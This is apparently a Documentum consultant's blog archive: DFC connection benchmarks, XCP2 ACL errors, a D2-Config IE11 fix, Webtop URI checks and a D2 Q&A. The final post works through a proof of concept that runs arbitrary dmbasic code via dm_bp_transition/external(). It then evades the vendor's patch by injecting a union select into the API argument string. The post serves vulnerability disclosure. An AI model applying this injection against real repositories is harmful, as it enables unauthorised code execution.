Session management. Beginning

It’s worth to read about probability density function before continuing reading this post.

One my skypemate is worried about following performance problem: they developed some kind of integration between customer application and EMC Documentum, initially integration was utilizing DFS capabilities, but later, due to performance issues, they switched to pure DFC, further, they had to upgrade to the latest supported DFC version and after that customer has started complaining about performance issues. Though my skypemate associates these complains with changes made in latest versions of DFC (ISM), I’m very skeptical about his suspicions: in my opinion any upgrade is a stress for production environment and any upgrade gives customer a motive to complaining – this is the nature of any customer: it always sounds like a brilliant idea to reveal old issues after some activities have been performed in production environment.

Though I do not share the opinion of my skypemate, his suspicions gave me an idea to write a series of posts about session management in DFC. But before discussing some aspects of DFC implementation we need to perform some basic measurements for typical DFC operations, otherwise we will not able to understand which operations are relatively fast and which ones are slow. To perform these measurements I designed a series of microbenchmarks – there are a dozen of benchmarks but currently we are interested only in four of them:

Benchmark methodology

Main benchmark class (tel.panfilov.documentum.benchmark.Benchmark) spawns a certain number of threads, each spawned thread performs a certain operation in a loop and increments global counter upon successful completion of operation, main thread measures global counter changes at specific time intervals and prints difference with previous value in standard output. Here I assume that all such measurements are independent. Diagrams shown below were created with following parameters:

  1. number of concurrent threads = 1
  2. number of measurements = 1000
  3. sleep time between measurements in milliseconds = 10000

For example:

java tel.panfilov.documentum.benchmark.Benchmark ssc_dev dmadmin dmadmin \
> tel.panfilov.documentum.benchmark.impl.Connection 1 1000
Executions per 10000ms: 2, iteration: 1
Executions per 10000ms: 3, iteration: 2
Executions per 10000ms: 4, iteration: 3
Executions per 10000ms: 3, iteration: 4

...

Executions per 10000ms: 3, iteration: 998
Executions per 10000ms: 2, iteration: 999
Executions per 10000ms: 3, iteration: 1000

Connection and authentication benchmarks

Connection benchmark was designed to do not leverage session pooling capabilities because I wanted to understand how slow Documentum stack performs connection handshaking, and the result is extremely poor – 6-8 connections per second:

Because authentication is a part of connection handshaking, I designed Authentication benchmark to understand how slow Documentum performs authentication – the result for user with inline password (unix authentication is 4 times slower, I suppose that LDAP authentication is even more slower) is 30-40 successful authentications per second:

Compare these results with Oracle database (OracleJDBC benchmark):

Why connection and authentication benchmarks demonstrate so poor performance?

Connection handshaking

When DFC-client tries to establish new connection with content server it performs following sequence of actions:

  1. establishes TCP connection with content server (after TCP handshaking content server spawns new process/thread which establishes connection with underlying database)
  2. sends “new session” RPC
  3. requests list of available RPC commands by sending “ENTRY_POINTS” RPC command
  4. sends “AUTHENTICATE_USER” RPC command
  5. sends “GET_ERRORS” RPC command
  6. receives available messages from content server

Actually, algorithm described above has following performance gaps:

  1. this is a good idea to maintain several spare or idle server processes/threads, which stand ready to serve incoming requests
  2. there is no reason to request entry points at every “connection” request – entry points must be cached on client side
  3. there is no reason to request messages from server by sending “GET_ERRORS” RPC command – actually this step is initiated by content server through setting extra flags in response for “AUTHENTICATE_USER” RPC command:
    [dmadmin@docu70dev01 ~]$ iapi
    Please enter a docbase name (docubase): ssc_dev
    Please enter a user (dmadmin):
    Please enter password for dmadmin:
    
    
    
            EMC Documentum iapi - Interactive API interface
            (c) Copyright EMC Corp., 1992 - 2012
            All rights reserved.
            Client Library Release 7.0.0130.0537
    
    
    Connecting to Server using docbase ssc_dev
    // receiving of this message is initiated by CS
    [DM_SESSION_I_SESSION_START]info:  "Session 0101ffd78010db5e started for user dmadmin."
    
    
    Connected to Documentum Server running Release 7.0.0140.0644  Linux.Oracle
    Session id is s0
    API>
    

Furthermore, content server does not cache user’s credentials after successful authentication, so every time when authentication is performed content server “honestly” tries to check user’s credentials. So, the result is “predictable”. To confirm my suspicions about suboptimal connection handshaking algorithm I have hacked my dctmpy library to measure how fast it performs only first and second steps of connection handshaking (and disconnect as well) and got expected result – about 25 connections per second, i.e. 3 times improvement:

[dmadmin@docu67dev02 ~]$ cat > test1.py
# coding=utf-8

from timeit import timeit


def main():
    setup = """\
from dctmpy.docbaseclient import DocbaseClient
session = DocbaseClient(
    host="192.168.2.56",
    port=12000,
    docbaseid=131031
)
entrypoints = session.entrypoints
session.disconnect
    """

    stmt = """\
session = DocbaseClient(
    host="192.168.2.56",
    port=12000,
    entrypoints=entrypoints,
    docbaseid=131031
)
session.disconnect()
    """

    A = timeit(setup=setup, stmt=stmt, number=1000)
    print("%15s %6.2fs" % ("Python", A))


if __name__ == '__main__':
    main()
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  39.08s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  36.94s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  40.12s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  39.45s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  36.24s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  37.98s
[dmadmin@docu67dev02 ~]$ python test1.py
         Python  42.81s

Object creation and fetch

The results for these two benchmarks are disappointing too – I suppose that results should be at least 10 times better.

About 20 sysobject creations per second:

About 80-100 fetches per second:

Another way to implement “controlled” database lock

The problem:

we are performing a lot of changes in transaction and want to prevent transaction from being aborted due to VERSION MISMATCH errors, so we need to put row-level lock on objects to be modified, but we do not want to wait for a long time because our transaction locks objects too (see some explanation in: Pessimistic locking, Pessimistic locking. Advanced approach.)

Continue reading

XCP2 vs ACLs

Yesterday another my skypemate asked me whether I know something about following XCP error:

An error occurred while performing the requested operation. Please try again.

  Details 
    Error in operation Object create failure type=jorm1_nomupis

Error code: E_ECM_OPERATION_ERROR
[DM_SYSOBJECT_E_INVALID_ACL_DOMAIN]error: 
    "The <object_type> '<object_name>' is given an invalid ACL domain 'dmadmin'."

EMC published ridiculous solution for this error, fortunately I did know the root cause of this error. Three cases:

user’s ACL:

API> retrieve,c,dm_acl where owner_name=USER
...
4501fd088003ad00
API> get,c,l,object_name
...
dm_4501fd088003ad00
API> create,c,dm_document
...
0901fd0880792c3e
API> set,c,l,acl_name
SET> dm_4501fd088003ad00
...
OK
API> set,c,l,acl_domain
SET> test01
...
OK
API> save,c,l
...
OK

repository owner’s ACL:

API> retrieve,c,dm_acl where owner_name='ssc_dev'
...
4501fd088002ec25
API> get,c,l,object_name
...
sample_acl
API> create,c,dm_document
...
0901fd0880792c3d
API> set,c,l,acl_name
SET> sample_acl
...
OK
API> set,c,l,acl_domain
SET> dm_dbo
...
OK
API> save,c,l
...
OK

foreign ACL:

API> retrieve,c,dm_acl where owner_name='dmadmin'
...
4501fd088000020a
API> get,c,l,object_name
...
dm_4501fd088000020a
API> create,c,dm_document
...
0901fd0880792c3c
API> set,c,l,acl_name
SET> dm_4501fd088000020a
...
OK
API> set,c,l,acl_domain
SET> dmadmin
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_INVALID_ACL_DOMAIN]error:  
   "The dm_document '' is given an invalid ACL domain 'dmadmin'."

Documentation (fundamentals guide, bit confusing but previous listing makes it clear):

  • Public ACLs are available for use by any user in the repository. Public ACLs created by the repository owner are called system ACLs. System ACLs can only be managed by the repository owner. Other public ACLs can be managed by their owners or a user with Sysadmin or Superuser
    privileges.
  • Private ACLs are created and owned by a user other than the repository owner. However, unlike public ACLs, private ACLs are available for use only by their owners, and only their owners or a superuser can manage them.

The problem was: by default XCP objects inherit ACLs from target folder:

and somebody decided to grant additional permissions on folder – strange that XCP does not have any foolproof.

D2-Config vs IE11

In spite of the fact that D2 has no practical interest for me (it has a good collection of anti-patters though), yesterday one of my skypemates asked me how to make D2-Config work in IE11. The problem is EMC added http-equiv attributes into D2 pages but forgot about D2-Config, so D2-Config does not work in IE11.

I know three options to resolve this issue:

  1. If you use apache httpd as reverse proxy it is enough to add Header set X-UA-Compatible “IE=EmulateIE7” into httpd.conf
  2. You can achieve the same on application server side using urlrewritefilter, something like:
    web.xml:
    <filter>
        <filter-name>UrlRewriteFilter</filter-name>
        <filter-class>org.tuckey.web.filters.urlrewrite.UrlRewriteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>UrlRewriteFilter</filter-name>
        <url-pattern>/*</url-pattern>
        <dispatcher>REQUEST</dispatcher>
        <dispatcher>FORWARD</dispatcher>
    </filter-mapping>
    
    urlrewrite.xml:
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE urlrewrite PUBLIC "-//tuckey.org//DTD UrlRewrite 4.0//EN" 
          "http://www.tuckey.org/res/dtds/urlrewrite4.0.dtd">
    <urlrewrite>
        <rule>
            <set type="response-header" name="X-UA-Compatible">IE=EmulateIE7</set>
        </rule>
    </urlrewrite>
    
  3. And finally, you can code your own filter:
    import javax.servlet.*;
    import javax.servlet.http.HttpServletResponse;
    import java.io.IOException;
    
    public class IEFilter implements Filter {
    
        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) 
                throws IOException, ServletException {
            HttpServletResponse res = (HttpServletResponse) response;
            res.addHeader("X-UA-Compatible", "IE=EmulateIE7");
            chain.doFilter(request, response);
        }
    
        @Override
        public void destroy() {
        
        }
    
        @Override
        public void init(FilterConfig filterConfig) throws ServletException {
        
        }
        
    }

I fixed it!

grounded Got a bad news for inhabitants of EMC Support Portal: today CERT disclosed a bunch of security vulnerabilities presented in EMC Documentum products, the most interesting thing here is a fact that CERT’s list primarily contains vulnerabilities previously announced by EMC as remediated. The list of contested CVEs is: CVE-2014-2518, CVE-2014-2514, CVE-2014-2507, CVE-2014-2513, CVE-2014-4618, CVE-2014-4626, CVE-2014-2515, CVE-2014-2504, CVE-2014-4629

I perceive the world: request.getRequestURI()

In Webtop 6.7SP2P05 EMC made some weird changes:

these changes completely removes usefulness of “componentlist” component:

after clicking on any component:

Initially I thought that this is a new security feature, but webtop configuration files should not contain any environment-sensitive information, otherwise webtop deployment gets into a mess. After some research I have found that webtop performs checks using following way:

HttpServletRequest request;
HttpServletResponse response;
// these regexps come from web.xml
Pattern staticPages = Pattern.compile(
        "(\\.bmp|\\.css|\\.htm|\\.html|\\.gif|\\.jar|\\.jpeg|\\.jpg|\\.js|\\.properties|\\.xml|\\.png)$",
        Pattern.CASE_INSENSITIVE);
Pattern configs = Pattern.compile("/app\\.xml|/config/.*\\.xml", Pattern.CASE_INSENSITIVE);
if (staticPages.matcher(request.getRequestURI()).find()) {
    if (configs.matcher(request.getRequestURI()).find()) {
        response.sendError(HttpServletResponse.SC_UNAUTHORIZED, 
                "The URL is unauthorized in WDK");
    }
}

What does getRequestURI() method return? Documentation:

Actually, this part of documentation is not clear and RFC 1808 comes to the rescue:

RFC 1808           Relative Uniform Resource Locators          June 1995


      <scheme>://<net_loc>/<path>;<params>?<query>#<fragment>

   each of which, except <scheme>, may be absent from a particular URL.
   These components are defined as follows (a complete BNF is provided
   in Section 2.2):

      scheme ":"   ::= scheme name, as per Section 2.1 of RFC 1738 [2].

      "//" net_loc ::= network location and login information, as per
                       Section 3.1 of RFC 1738 [2].

      "/" path     ::= URL path, as per Section 3.1 of RFC 1738 [2].

      ";" params   ::= object parameters (e.g., ";type=a" as in
                       Section 3.2.2 of RFC 1738 [2]).

      "?" query    ::= query information, as per Section 3.3 of
                       RFC 1738 [2].

      "#" fragment ::= fragment identifier.

Now:

Q&A. II

Two days ago I received a bunch of questions related to Documentum products:

Comment: Great Blog !!

Few random questions

  1. Are D2 methods implementing ID2Method, and using session passed in execute method by default under transaction? I have seen transaction errors if an exception is thrown inside it by custom code. What if we start our own transaction?
  2. What exactly is D2Session.initTBO(session);? When to use and when not to use it?
  3. Best practice or approach around xPlore you found typically for non indexed document or cause of failure? Some of the xPlore admin reports are good, but for finding cause of each document non searchable, there may be different reason. Any easy way to diagnose that? Also lots of initial documents were migrated and hence there was a batch queue item and not single
  4. Can dynamic groups be used with D2?

Just posting a few which came up in my head right now 🙂

– Anurag

And So …

Q:

Are D2 methods implementing ID2Method, and using session passed in execute method by default under transaction? I have seen transaction errors if an exception is thrown inside it by custom code. What if we start our own transaction?

A:

The behaviour is controlled by -transaction method argument, in case of absence of this argument job methods are executed in transaction, another methods – not. If you see transaction-related errors like:

  • Transaction is already active
  • Transaction is not active
  • Transaction invalid due to errors, please abort transaction
  • Session disconnected with an unfinished transaction

this means that somebody does not work properly with transactions, the only correct transaction usage pattern is:

// the rule of thumb is perform begin/commit/abort in the same scope, to
// support nesting we check whether transaction is already active or not
boolean txStartsHere = false;
try {
    // if transaction is already active we mustn't try to
    // begin/commit/abort transaction in our code because we don't
    // control transaction
    if (!session.isTransactionActive()) {
        session.beginTrans();
        txStartsHere = true;
    }

    // business logic here

    // transaction is controlled by our code
    if (txStartsHere) {
        session.commitTrans();
        txStartsHere = false;
    }
} finally {
    // transaction is controlled by our code, commitTrans can throw
    // exception but DFC forcibly aborts
    // transaction in this case, so we need to check transaction state
    if (txStartsHere && session.isTransactionActive()) {
        session.abortTrans();
    }
}

all other patterns are wrong (the weird thing here is the above pattern is mentioned in DFC development guide, but it seems the EMC developers don’t read documentation), for example – XCP2 antipattern (DataTypeAspectUtils.xcpSave):

boolean transactionStarted = Utils
        .createTransactionIfNotActive(session);
try {
    
    // business logic
    
    if (transactionStarted) {
        session.commitTrans();
    }
} catch (Exception e) {
    Utils.handleRollbackIfReqd(session, transactionStarted);
    Utils.ThrowDfcException(e);
} finally {
    // another logic
}

here XCP developers do not know about the whole class of exceptions.

Q:

What exactly is D2Session.initTBO(session);? When to use and when not to use it?

A:

When DFC tries to find implementation class associated with TBO/Aspect/SBO/Module it performs some lookups depending of module type:

SBO lookup order:

  1. IntrinsicModuleRegistry (hardcoded modules in com.documentum.fc.client.impl.bof.registry.IntrinsicModuleRegistry)
  2. Global Registry Repository (you can setup precedence for specific DFC and JVM versions by specifying dmc_module.min_dfc_version and dmc_jar.min_vm_version)
  3. dbor.properties

TBO lookup order:

  1. Session repository
  2. dbor.properties
  3. IntrinsicModuleRegistry

Aspect lookup order:

  1. IntrinsicModuleRegistry
  2. Session repository

all other modules lookup order:

  1. IntrinsicModuleRegistry
  2. Session repository
  3. dbor.properties

D2Session.initTBO(session) registers D2’s BO implementation classes by performing manipulations with IntrinsicModuleRegistry using reflection API (it doing something like IntrinsicModuleRegistry.getInstance().registerTBO(String name, String className)). For me it is not clear why D2 is still not under BOFv2 deployment. So, if you are going to work with D2’s objects you need to call D2Session.initTBO(session).

Q:

Best practice or approach around xPlore you found typically for non indexed document or cause of failure? Some of the xPlore admin reports are good, but for finding cause of each document non searchable, there may be different reason. Any easy way to diagnose that? Also lots of initial documents were migrated and hence there was a batch queue item and not single

A:

I had tried to play with xPlore a couple of times, and would say that behaviour you describe is common for every xPlore installation – it just not intended for use in production. The only best practice here is escalate problems to support.

Q:

Can dynamic groups be used with D2?

A:

Dynamic groups is primarily CS and DFC feature, the answer for your question depends on whether D2 has customizations points or not, for example, I don’t know how to implement this approach in XCP or D2.

What makes api/dmbasic suck

A year ago I discovered a design gap in Documentum lifecyles: though it is required to user have some permissions for both document and dm_policy objects to be able to promote document or attach lifecycle to document:

all lifecycle stuff narrows down to executing either dm_bp_transition or dm_bp_transition_java docbase method, so any user is able to change lifecycle state of any document by executing docbase method directly. Actually, the problem is more serious because dm_bp_transition docbase method is insecure by design – it accepts identifiers of “external” procedures and executes anything that is written there:

'------------------------------------------------------------
Sub BP_Transition(_

...

    userEntryID$,_
    actionID$,_
    userActionID$,_

...

  'Evaluate the user-defined entry criteria
  If (result = True And run_entry = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Run user defined entry criteria."
    End If
    result = RunProcedure(userEntryID, 1, sess, sysID,_
                          user_name, targetState)
  End If

...

  If (procID <> "0000000000000000") Then
    result = CheckStatus("", 1, "loading procedure " & procID, True, errorMsg)
    result = external(procID)
    If (result = True) Then
      If (procNo = 1) Then
        ' --- Running user-defined entry criteria ---
        result = CheckStatus("", 1, "Running EntryCriteria", True, errorMsg)
        On Error Goto NoFunction
        result = EntryCriteria(sessID, objID, userName,_
                               targetState, errorStack)

...

A clear example:

 ~]$ cat external.ebs
Function EntryCriteria() as Boolean
   print "Hello, world!"
   EntryCriteria = True
End Function
 ~]$ cat test.ebs
Sub Test(procedureId$)
  Dim result as Boolean
  sess = dmAPIGet("connect,ssc_dev,dmadmin,dmadmin")
  result = external(procedureId$)
  result = EntryCriteria()
End Sub

 ~]$ iapi ssc_dev -Udmadmin -Pdmadmin
Session id is s0
API> create,c,dm_procedure
...
0801ffd7804368e6
API> setfile,c,l,external.ebs,crtext
...
OK
API> save,c,l
...
OK
API> exit
Bye

 ~]$ dmbasic -f test.ebs -eTest -- 0801ffd7804368e6
Hello, world!
 ~]$ 

I think it’s obvious that correct security fix must do following:

  • Restrict access to dm_bp_transition and dm_bp_transition_java methods
  • Check input parameters of dm_bp_transition method (identifiers of procedures to execute are stored in dm_policy object)

Unfortunately, this is not obvious for EMC (or too hard to implement basic checks using dmbasic) – they decided that the root cause of security vulnerability is a fact that any user is able to create dm_procedure objects (yeah, every man is a potential rapist – let’s cut off penises), and now we have:

API> create,c,dm_procedure
...
0801ffd780436937
API> save,c,l
...
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:  
  "The current user (test02) needs to have superuser or sysadmin privilege."

Unfortunately external() function in dmbasic accepts not only dm_procedure objects but any dm_sysobject:

API> create,c,dm_document
...
0901ffd780436944
API> setfile,c,l,external.ebs,crtext
...
OK
API> save,c,l
...
OK
API> Bye
 ~]$ dmbasic -f test.ebs -eTest -- 0901ffd780436944
Hello, world!

What did EMC for that? They decided that it is a good idea to load only dm_procedure objects in external() dmbasic’s function:

~]$ strings dmbasic | grep dm_procedure
id,%s,dm_procedure where object_name = '%s' and folder('%s')
id,%s,dm_procedure where r_object_id = '%s'
 ~]$ cat test.ebs
Sub Test(procedureId$)
  Dim result as Boolean
  sess = dmAPIGet("connect,ssc_dev,dmadmin,dmadmin")
  result = external(procedureId$)
  print dmAPIGet("getmessage,c")
  result = EntryCriteria()
End Sub
 ~]$ dmbasic -f test.ebs -eTest -- 0901ffd780436944
[DM_API_W_NO_MATCH]warning:  "There was no match in the docbase for the qualification: 
   dm_procedure where r_object_id = '0901ffd780436944'"

dmbasic: Error 35 in line 6: Sub or Function not defined
 ~]$

Does it look good? Actually, no. I have no idea who invented so ridiculous way to call Documentum RPCs through dmAPIGet/dmAPIExec commands, but concatenating command and arguments into single string and then parsing that string is a bad idea, take a look at API magic:

Session id is s0
API> id,c,dm_procedure where r_object_id='0901ffd780436944,' 
   union select r_object_id from dm_sysobject where r_object_id='0901ffd780436944'
...
0901ffd780436944
API> fetch,c,0901ffd780436944,' union select r_object_id 
   from dm_sysobject where r_object_id='0901ffd780436944
...
OK

Now:

 ~]$ dmbasic -f test.ebs -eTest -- "0901ffd780436944,' union \
> select r_object_id from dm_sysobject where r_object_id='0901ffd780436944"

Hello, world!
 ~]$